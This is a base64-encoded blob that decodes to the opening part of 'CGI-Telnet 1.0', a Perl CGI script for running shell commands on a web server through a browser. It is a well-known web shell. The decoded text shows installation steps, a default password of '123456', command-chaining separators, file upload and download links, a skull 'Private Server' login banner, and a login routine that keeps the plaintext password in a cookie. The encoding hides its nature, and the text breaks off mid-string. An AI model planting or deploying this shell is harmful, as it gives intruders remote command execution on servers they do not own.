\'IyEvdXNyL2Jpbi9wZXJsCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIENHSS1UZWxuZXQgVmVyc2lvbiAxLjAgZm9yIE5UIGFuZCBVbml4IDogUnVuIENvbW1hbmRzIG9uIHlvdXIgV2ViIFNlcnZlcgojCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlLCBkaXN0cmlidXRlIGFuZCBtb2RpZnkgdGhpcyBzY3JpcHQgc28gbG9uZwojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0CiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQojIGluIHRoaXMgc2NyaXB0LCB5b3UgY2FuIGUtbWFpbCBtZS4KIwojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQojIEF1dGhvciBlLW1haWw6IHJvaGl0YWJAcm9oaXRhYi5jb20KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vCiMgU2NyaXB0IEhvbWVwYWdlOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2NnaXNjcmlwdHMvY2dpdGVsbmV0Lmh0bWwKIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8KIyBEaXNjdXNzaW9uIEZvcnVtOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2Rpc2N1c3MvCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0LwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgSW5zdGFsbGF0aW9uCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0CiMKIyAxLiBNb2RpZnkgdGhlIGZpcnN0IGxpbmUgIiMhL3Vzci9iaW4vcGVybCIgdG8gcG9pbnQgdG8gdGhlIGNvcnJlY3QgcGF0aCBvbgojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLgojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4KIyAzLiBJZiB5b3UncmUgcnVubmluZyB0aGUgc2NyaXB0IHVuZGVyIFdpbmRvd3MgTlQsIHNldCAkV2luTlQgPSAxIGluIHRoZQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8KIyAgICBleGVjdXRlIENHSSBzY3JpcHRzLiBUaGlzIGlzIHVzdWFsbHkgY2dpLWJpbi4gTWFrZSBzdXJlIHRoYXQgeW91IHVwbG9hZAojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4KIyA2LiBPcGVuIHRoZSBzY3JpcHQgaW4geW91ciB3ZWIgYnJvd3Nlci4gSWYgeW91IHVwbG9hZGVkIHRoZSBzY3JpcHQgaW4KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQokUGFzc3dvcmQgPSAiMTIzNDU2IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+Q0dJLVRlbG5ldCBWZXJzaW9uIDEuMDwvdGl0bGU+CiRIdG1sTWV0YUhlYWRlcgo8L2hlYWQ+Cjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMDAwMDAwIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPgo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4KPHRyPgo8dGQgYmdjb2xvcj0iI0MyQkZBNSIgYm9yZGVyY29sb3I9IiMwMDAwODAiIGFsaWduPSJjZW50ZXIiPgo8Yj48Zm9udCBjb2xvcj0iIzAwMDA4MCIgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48Yj5DR0ktVGVsbmV0IFZlcnNpb24gMS4wIC0gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9udD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjQzJCRkE1Ij48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT4KPC9mb250PjwvdGQ+CjwvdHI+CjwvdGFibGU+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8cHJlPjxmb250IGNvbG9yPSIjNjY5OTk5Ij4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8KLyAgX18gXHwgIF9fIFx8XyAgIF98ICAgICAgICB8XyAgIF98ICAgICAgfCB8ICAgICAgICAgICAgIHwgfAp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xwp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wKfCBcX18vXHwgfF9cIFwgX3wgfF8gICAgICAgICAgIHwgfCAgfCAgX18vfCB8fCB8IHwgfHwgIF9fL3wgfF8KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAo8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiAgICAgICAgICAgICAgICAgICAgICBfX19fX18gICAgICAgICAgICAgPC9mb250Pjxmb250IGNvbG9yPSIjQUU4MzAwIj7CqSAyMDAxLCBSb2hpdGFiIEJhdHJhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4KICAgICAgICAgICAgICAgICAgLyAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8CiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfAogICAgICAgICAgICAgICAgIHwgKShfby8gIFxvXykoIHwKICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8CiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQogIF8gICAgICkgXDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+XDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnxJSUlJSUl8PC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+LzwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fX19fX19fX19fX19fX19fX18KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxJSUlJSUkvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDgwODAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPgogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvIAogICAgICAgKEAgICAgICAgICAgIGAtLS0tLS0tLWAKICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+CiQ7CiMnCglwcmludCA8PEVORDsKPGNvZGU+ClRyeWluZyAkU2VydmVyTmFtZS4uLjxicj4KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPgpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dCjxjb2RlPiRNZXNzYWdlCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGNvZGU+Cjxicj5sb2dpbjogYWRtaW48YnI+CnBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5Gb3JtCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlRm9vdGVyCnsKCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ291dAp7CglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkmUHJpbnRMb2dvdXRTY3JlZW47CgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0CiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QKIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIKIyB0byBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9naW4gCnsKCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkCgl7CgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVy